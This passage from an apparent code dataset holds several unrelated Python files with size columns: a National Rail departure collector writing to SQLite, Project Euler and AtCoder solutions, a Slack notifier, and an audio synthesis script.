data["soap:Envelope"]["soap:Body"]["GetDepBoardWithDetailsResponse"]["GetStationBoardResult"]["lt5:trainServices"]["lt5:service"]
if type(services) is not list:
services = [services]
for service in services:
if "lt5:subsequentCallingPoints" not in service:
raw_points = []
else:
raw_points = service["lt5:subsequentCallingPoints"]["lt4:callingPointList"]["lt4:callingPoint"]
filtered_points = filter(lambda point: "lt4:crs" in point and "lt4:locationName" in point, raw_points)
calling_points = map(lambda point: {
"crs": point["lt4:crs"],
"name": point["lt4:locationName"],
"st": point.get("lt4:st", "-"),
"et": point.get("lt4:et", "-")
}, filtered_points)
cp_string = "|".join(
map(lambda p: "{0},{1},{2},{3}".format(p["crs"], p["name"], p["st"], p["et"]),
calling_points)
)
yield {
"crs": crs,
"origin": service["lt5:origin"]["lt4:location"]["lt4:locationName"],
"destination": service["lt5:destination"]["lt4:location"]["lt4:locationName"],
"std": service.get("lt4:std"),
"etd": service.get("lt4:etd"),
"platform": service.get("lt4:platform", "-"),
"calling_points": cp_string
}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='National Rail Data Collector')
parser.add_argument('--key', help='API Key', required=True)
parser.add_argument('--url', help='API URL', default="http://lite.realtime.nationalrail.co.uk/OpenLDBWS/ldb9.asmx")
parser.add_argument('--crs', help='CRS Station Code (default is Thatcham)', default="THA")
parser.add_argument('--db', help='SQLite DB Name', default="data/trains.db")
args = parser.parse_args()
execute_sql(args.db, "create table if not exists departures (crs TEXT, platform TEXT, std TEXT, etd TEXT, origin TEXT, destination TEXT, calling_points TEXT);")
crs_list = args.crs.split(",")
while True:
for crs in crs_list:
try:
print "Processing station '{0}'".format(crs)
departures = fetch_trains(args.url, args.key, crs)
delete_where(args.db, "departures", "crs == '{0}'".format(crs))
insert_into_db(args.db, "departures", departures)
sleep(1)
except Exception as e:
print e.message
sleep(10)
| 3,815 | 1,307 |
"""
Problem 12
Highly divisible triangular number
"""
from utility.decorators import timeit, printit
from utility.math_f import sum_naturals_to_n, get_divisors
from math import ceil, sqrt
def div_count(n):
# Returns the count of divisors of a number
total = 0
for i in range(1, int(ceil(sqrt(n)))+1): # Check up to sqrt(n)
if n % i == 0: # If i is a factor then n/i is also a factor
total += 2
if i*i == n: # If i is the sqrt(n) then it is a square (only one factor)
total -= 1
return total
@printit
@timeit
def run(m):
for n in range(1, 1000000):
if n % 2 == 0:
cnt = div_count(n/2) * div_count(n+1)
else:
cnt = div_count(n) * div_count((n+1)/2)
if cnt >= m:
return sum_naturals_to_n(n)
if __name__ == "__main__":
n = 500
run(n)
| 877 | 339 |
# uninhm
# https://atcoder.jp/contests/abc183/tasks/abc183_d
# data structures, sorting
n, w = map(int, input().split())
needed = []
for _ in range(n):
s, t, p = map(int, input().split())
needed.append((s, p))
needed.append((t, -p))
needed.sort()
cum = 0
for i in range(len(needed)):
cum += needed[i][1]
if i != len(needed)-1 and needed[i+1][0] == needed[i][0]:
continue
if cum > w:
print("No")
quit()
print("Yes")
| 469 | 192 |
#!/usr/bin/env python
import os
from slackclient import SlackClient
def send(msg="no msg", rsp="ok"):
channel = os.environ['SLACK_CHANNEL']
if "ok" == rsp:
if 'SKIP_OK_MESSAGES' in os.environ and os.environ['SKIP_OK_MESSAGES']:
return
if 'SLACK_OK_CHANNEL' in os.environ and os.environ['SLACK_OK_CHANNEL']:
channel = os.environ['SLACK_OK_CHANNEL']
msg = ":white_check_mark: " + msg
else:
msg = ":bomb: " + msg
sc = SlackClient(token=os.environ['SLACK_API_TOKEN'])
sc.api_call(
"chat.postMessage",
channel=channel,
text=msg
)
| 635 | 239 |
#!/usr/bin/env python
# Idea taken from www.wavepot.com
import math
from AudioPython import *
from AudioPython.dsp import *
def bass_osc(n):
tri = triangle_wave(frequency=n, amplitude=0.24)
sine = sine_wave(frequency=n*32, amplitude=0.052)
while True:
yield next(tri) + next(sine)
def sub(gen, amp):
c = 0
tau = 2 * math.pi
while True:
c += 0.000014
yield math.sin(next(gen) * (1 + math.sin(1.1337 * c * tau)) * (2 + (1 +
math.sin(0.42 * c * tau)) * 15) + tau * c) * amp
n = 44100 / 500
channels = ((sub(bass_osc(n), 0.3),),)
samples = compute_samples(channels)
write_wavefile("temp.wav", samples)
| 678 | 289 |